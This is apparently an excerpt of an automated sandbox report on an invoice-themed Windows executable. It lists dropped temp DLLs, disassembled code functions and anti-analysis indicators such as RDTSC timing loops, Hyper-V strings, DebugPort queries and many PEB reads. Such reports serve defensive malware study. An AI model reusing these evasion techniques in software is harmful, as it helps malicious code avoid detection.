      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_73472351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_73472351
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_324B135E push eax; iretd 3_2_324B1369
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_324B225F pushad ; ret 3_2_324B27F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_324B27FA pushad ; ret 3_2_324B27F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_324B283D push eax; iretd 3_2_324B2858
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_324E09AD push ecx; mov dword ptr [esp], ecx 3_2_324E09B6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe File created: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe File created: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\LangDLL.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe API/Special instruction interceptor: Address: 4F46F34
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe API/Special instruction interceptor: Address: 1B66F34
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe RDTSC instruction interceptor: First address: 4F06F11 second address: 4F06F11 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F8EC0E4C268h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe RDTSC instruction interceptor: First address: 1B26F11 second address: 1B26F11 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F8EC0AFB528h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_3255D1C0 rdtsc 3_2_3255D1C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\LangDLL.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Evaded block: after key decision graph_0-4544
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe API coverage: 0.2 %
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe TID: 1576 Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004066F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_004065AA FindFirstFileW,FindClose, 0_2_004065AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_00402B75 FindFirstFileW, 0_2_00402B75
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002448000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2327283512.000000000249A000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361283807.000000000249A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe API call chain: ExitProcess graph end node graph_0-4432
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_3255D1C0 rdtsc 3_2_3255D1C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_00402048 LdrInitializeThunk,ShowWindow,EnableWindow, 0_2_00402048
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_73472351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_73472351
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_3256D250 mov ecx, dword ptr fs:[00000030h] 3_2_3256D250
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A903E mov eax, dword ptr fs:[00000030h]3_2_325A903E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A903E mov eax, dword ptr fs:[00000030h]3_2_325A903E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A903E mov eax, dword ptr fs:[00000030h]3_2_325A903E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A903E mov eax, dword ptr fs:[00000030h]3_2_325A903E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B50D9 mov eax, dword ptr fs:[00000030h]3_2_325B50D9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325090DB mov eax, dword ptr fs:[00000030h]3_2_325090DB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov ecx, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov ecx, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov ecx, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov ecx, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D0C0 mov eax, dword ptr fs:[00000030h]3_2_3255D0C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D0C0 mov eax, dword ptr fs:[00000030h]3_2_3255D0C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325050E4 mov eax, dword ptr fs:[00000030h]3_2_325050E4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325050E4 mov ecx, dword ptr fs:[00000030h]3_2_325050E4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD08D mov eax, dword ptr fs:[00000030h]3_2_324DD08D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D090 mov eax, dword ptr fs:[00000030h]3_2_3250D090
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D090 mov eax, dword ptr fs:[00000030h]3_2_3250D090
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251909C mov eax, dword ptr fs:[00000030h]3_2_3251909C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256D080 mov eax, dword ptr fs:[00000030h]3_2_3256D080
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256D080 mov eax, dword ptr fs:[00000030h]3_2_3256D080
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E5096 mov eax, dword ptr fs:[00000030h]3_2_324E5096
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9148 mov eax, dword ptr fs:[00000030h]3_2_324D9148
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9148 mov eax, dword ptr fs:[00000030h]3_2_324D9148
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9148 mov eax, dword ptr fs:[00000030h]3_2_324D9148
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9148 mov eax, dword ptr fs:[00000030h]3_2_324D9148
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5152 mov eax, dword ptr fs:[00000030h]3_2_325B5152
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573140 mov eax, dword ptr fs:[00000030h]3_2_32573140
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573140 mov eax, dword ptr fs:[00000030h]3_2_32573140
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573140 mov eax, dword ptr fs:[00000030h]3_2_32573140
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E7152 mov eax, dword ptr fs:[00000030h]3_2_324E7152
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32579179 mov eax, dword ptr fs:[00000030h]3_2_32579179
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB136 mov eax, dword ptr fs:[00000030h]3_2_324DB136
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB136 mov eax, dword ptr fs:[00000030h]3_2_324DB136
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB136 mov eax, dword ptr fs:[00000030h]3_2_324DB136
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB136 mov eax, dword ptr fs:[00000030h]3_2_324DB136
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B7120 mov eax, dword ptr fs:[00000030h]3_2_325B7120
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1131 mov eax, dword ptr fs:[00000030h]3_2_324E1131
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1131 mov eax, dword ptr fs:[00000030h]3_2_324E1131
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251D1D0 mov eax, dword ptr fs:[00000030h]3_2_3251D1D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251D1D0 mov ecx, dword ptr fs:[00000030h]3_2_3251D1D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B51CB mov eax, dword ptr fs:[00000030h]3_2_325B51CB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325871F9 mov esi, dword ptr fs:[00000030h]3_2_325871F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E51ED mov eax, dword ptr fs:[00000030h]3_2_324E51ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B31E1 mov eax, dword ptr fs:[00000030h]3_2_325B31E1
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32537190 mov eax, dword ptr fs:[00000030h]3_2_32537190
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32595180 mov eax, dword ptr fs:[00000030h]3_2_32595180
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32595180 mov eax, dword ptr fs:[00000030h]3_2_32595180
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325911A4 mov eax, dword ptr fs:[00000030h]3_2_325911A4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325911A4 mov eax, dword ptr fs:[00000030h]3_2_325911A4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325911A4 mov eax, dword ptr fs:[00000030h]3_2_325911A4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325911A4 mov eax, dword ptr fs:[00000030h]3_2_325911A4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FB1B0 mov eax, dword ptr fs:[00000030h]3_2_324FB1B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32519660 mov eax, dword ptr fs:[00000030h]3_2_32519660
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32519660 mov eax, dword ptr fs:[00000030h]3_2_32519660
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3257D660 mov eax, dword ptr fs:[00000030h]3_2_3257D660
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251F603 mov eax, dword ptr fs:[00000030h]3_2_3251F603
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32511607 mov eax, dword ptr fs:[00000030h]3_2_32511607
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E3616 mov eax, dword ptr fs:[00000030h]3_2_324E3616
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E3616 mov eax, dword ptr fs:[00000030h]3_2_324E3616
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5636 mov eax, dword ptr fs:[00000030h]3_2_325B5636
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
